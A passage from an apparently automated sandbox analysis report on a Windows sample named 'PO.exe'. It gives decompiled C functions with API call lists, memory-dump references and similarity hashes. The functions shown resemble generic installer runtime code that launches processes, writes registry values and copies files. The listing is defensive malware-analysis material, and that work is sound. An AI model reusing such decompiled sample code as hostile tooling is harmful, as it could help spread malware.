                                            0x00401c68
                                            0x00401c6b
                                            0x00401c93
                                            0x00401cc7
                                            0x00401cc7
                                            0x00401c6d
                                            0x00401c7b
                                            0x00401c83
                                            0x00401c86
                                            0x00401c86
                                            0x00401c6b
                                            0x00401cca
                                            0x00401ccd
                                            0x00401cd3
                                            0x004028d7
                                            0x004028d7
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                            • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                            • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                            • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\alfons\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                            0x00401ea2
                                            0x00401ea7
                                            0x00401eb2
                                            0x00401eb9
                                            0x00401ebc
                                            0x004026da
                                            0x00401ec2
                                            0x00401ec5
                                            0x00401ed6
                                            0x00401ed1
                                            0x00401ed1
                                            0x00401eeb
                                            0x00401ef4
                                            0x00401f04
                                            0x00401f06
                                            0x00401f06
                                            0x00401ef6
                                            0x00401efa
                                            0x00401efa
                                            0x00401ef4
                                            0x00401f0d
                                            0x00401f10
                                            0x00401f10
                                            0x00402932
                                            0x0040293e

                                            APIs
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                              • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                              • Part of subcall function 00405247: CreateProcessA.KERNEL32 ref: 00405283
                                              • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                            • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                            • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 4003922372-1943935188
                                            • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                            • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                            • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                            • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                            0x00405250
                                            0x0040525a
                                            0x00405265
                                            0x0040526b
                                            0x0040526b
                                            0x00405283
                                            0x0040528b
                                            0x00405290
                                            0x00000000
                                            0x00405296
                                            0x0040529a

                                            APIs
                                            • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                            • CreateProcessA.KERNEL32 ref: 00405283
                                            • CloseHandle.KERNEL32(?), ref: 00405290
                                            Strings
                                            • Error launching installer, xrefs: 00405247
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AttributesCloseCreateFileHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 2000254098-66219284
                                            • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                            • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                            • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                            • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                            0x004054cd
                                            0x004054e4
                                            0x004054ec
                                            0x004054ec
                                            0x004054f4

                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                            • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-823278215
                                            • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                            • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                            • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                            • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










                                            0x00402387
                                            0x0040238c
                                            0x00402396
                                            0x004023a0
                                            0x004023a3
                                            0x004023b5
                                            0x004023bc
                                            0x004023c4
                                            0x004023d2
                                            0x004023d6
                                            0x004023e1
                                            0x004023e1
                                            0x004023e5
                                            0x004023e9
                                            0x004023ef
                                            0x004023f4
                                            0x004023f4
                                            0x004023f8
                                            0x00402404
                                            0x00402404
                                            0x0040241d
                                            0x0040241f
                                            0x0040241f
                                            0x00402422
                                            0x004024fb
                                            0x004024fb
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                            • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                            • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                            • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                            • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                            0x00401f50
                                            0x00401f53
                                            0x00401f5b
                                            0x00401f60
                                            0x00401f65
                                            0x00401f69
                                            0x00401f6c
                                            0x00401f6e
                                            0x00401f75
                                            0x00401f7e
                                            0x00401f86
                                            0x00401f89
                                            0x00401f9e
                                            0x00401fa4
                                            0x00401fb7
                                            0x00401fc0
                                            0x00401fcc
                                            0x00401fd1
                                            0x00401fd1
                                            0x00401fb7
                                            0x00401fd4
                                            0x00401be1
                                            0x00401be1
                                            0x00401f89
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                            • String ID:
                                            • API String ID: 1404258612-0
                                            • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                            • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                            • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                            • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                            0x004021fc
                                            0x00402200
                                            0x00402208
                                            0x0040220e
                                            0x00402211
                                            0x0040221e
                                            0x0040222f
                                            0x00402233
                                            0x0040223a
                                            0x00402243
                                            0x0040224b
                                            0x0040224e
                                            0x00402251
                                            0x00402255
                                            0x00402266
                                            0x0040226f
                                            0x004026da
                                            0x004026da
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • lstrlenA.KERNEL32 ref: 00402218
                                            • lstrlenA.KERNEL32(00000000), ref: 00402222
                                            • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                            • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                            • String ID:
                                            • API String ID: 3674637002-0
                                            • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                            • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                            • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                            • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                            0x00405568
                                            0x0040556f
                                            0x00405572
                                            0x00405577
                                            0x0040558a
                                            0x004055a4
                                            0x00000000
                                            0x004055a4
                                            0x0040558e
                                            0x0040558f
                                            0x00405592
                                            0x00405593
                                            0x0040559b
                                            0x00000000
                                            0x00000000
                                            0x0040559d
                                            0x004055a0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004055a0
                                            0x00000000
                                            0x00405580
                                            0x00000000
                                            0x00405581

                                            APIs
                                            • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040556D
                                            • CharNextA.USER32(00000000), ref: 00405572
                                            • CharNextA.USER32(00000000), ref: 00405581
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 3213498283-823278215
                                            • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                            • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                            • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                            • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 61%
                                            			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
